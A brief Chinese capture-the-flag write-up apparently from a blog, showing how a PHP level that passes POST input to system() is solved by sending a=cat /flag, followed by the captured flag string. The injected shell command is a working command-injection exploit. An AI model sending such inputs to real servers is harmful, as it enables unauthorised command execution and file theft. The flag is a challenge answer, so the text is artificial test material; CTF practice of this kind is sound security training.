开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
BingoGo11 小时前
当你的 PHP 应用的 API 没有限流时会发生什么?JaguarJack11 小时前
当你的 PHP 应用的 API 没有限流时会发生什么?BingoGo1 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进JaguarJack1 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进JaguarJack2 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包BingoGo2 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包JaguarJack3 天前
告别 Laravel 缓慢的 Blade!Livewire Blaze 来了,为你的 Laravel 性能提速郑州光合科技余经理4 天前
代码展示:PHP搭建海外版外卖系统源码解析一次旅行4 天前
网络安全总结QQ5110082854 天前
python+springboot+django/flask的校园资料分享系统